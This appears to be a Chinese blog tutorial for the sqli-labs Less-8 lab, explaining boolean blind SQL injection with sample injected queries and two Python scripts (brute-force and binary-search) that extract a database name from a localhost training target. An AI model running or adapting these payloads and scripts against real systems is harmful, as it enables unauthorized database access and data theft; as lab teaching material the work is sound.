sql注入less8——布尔盲注

sql注入第八关卡是布尔盲注,我们将看不到一般的返回值,只能通过You are in......的消失与否来判断自己输入的字符是否与查询的数据的字符相同,相同则显示You are in......,相反则不显示,如下图所示:

查询语句:id=1' and substr(database(),1,1) = 's' --+

相同时:

查询语句:id=1' and substr(database(),1,1) = 'a' --+

不同时:

因为这样一次一次的去输入,去判断,所需时间确实太久了,所以用脚本来实现是最好的

复制代码
import requests


def get_database(url):
    name = ''  # 初始化一个空字符串用于存储数据库名
    letters = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@#$%^&*'  # 包含可能的字符列表

    # 循环每个数据库名的字符位置
    for i in range(1, 20):  # 假设数据库名最长为20个字符
        # 循环尝试每个可能的字符
        for j in letters:
            # 构造盲注payload
            payload = "1' AND SUBSTRING((SELECT DATABASE()), %d, 1) = '%s'-- " % (i, j)
            # 发送请求
            res = requests.get(url, params={"id": payload})
            # 检查响应是否包含特定字符串,即数据库名
            if "You are in" in res.text:
                # 找到一个字符后,将其添加到数据库名中
                name += j
                print(name)  # 打印当前已获取的数据库名
                break  # 跳出当前循环,继续下一个位置的字符

    return name


# 目标URL
url = 'http://127.0.0.1/sqli-labs/less-8/'
# 调用函数获取数据库名
db_name = get_database(url)
print("Database Name:", db_name)

效果:

可这个效率依旧太差了,因为代码中有两个for循环,大大增加了查询时间,因此我们用二分查找来增加脚本效率

复制代码
import requests

def get_database(url):
    name = ''
    for i in range(1,10):
        low = 32
        high = 128
        mid = (high + low) // 2
        while low < high:
            payload = "?id=1' and ascii(substr(database(),%d,1)) > %d--+" % (i,mid)
            res = requests.get(url + payload)
            if "You are in" in res.text:
                low = mid + 1
            else:
                high = mid
            mid = low + (high - low) // 2
        if mid == 32:
            break
        name = name + chr(mid)
    print(name)
    return name


url = 'http://127.0.0.1/sqli-labs/less-8/'
db_name = get_database(url)
print("Dataname是:",db_name)
相关推荐
尽兴-29 分钟前
Redis 为什么快?
数据库·redis·内存
林澈在路上31 分钟前
最新版权清晰 AI音乐写歌工具软件App推荐 商用全场景实测指南
数据库·人工智能·ai·aigc·音频
Full Stack Developme1 小时前
正则表达式的使用教程
java·数据库·正则表达式
大郭鹏宇1 小时前
MongoDB快速实战与基本原理入门
数据库·mongodb
KASH_SHADOW1 小时前
8-Mysql的安装与配置
数据库·mysql·adb
澈2072 小时前
【无标题】QT入门第十二天:数据库编程(下)模型视图与数据展示 | 零基础学QT
数据库·qt·oracle
云絮.2 小时前
数据库事务
java·开发语言·数据库
Leon-Ning Liu3 小时前
【真实经验分享】OGG抽取进程报错 ORA-07445 [kgherrordmp()+986] ORA-00600 [17114]分析步骤
运维·数据库
CCPC不拿奖不改名3 小时前
Redis 工程化部署深度解析
linux·服务器·数据库·redis·深度学习·缓存·rag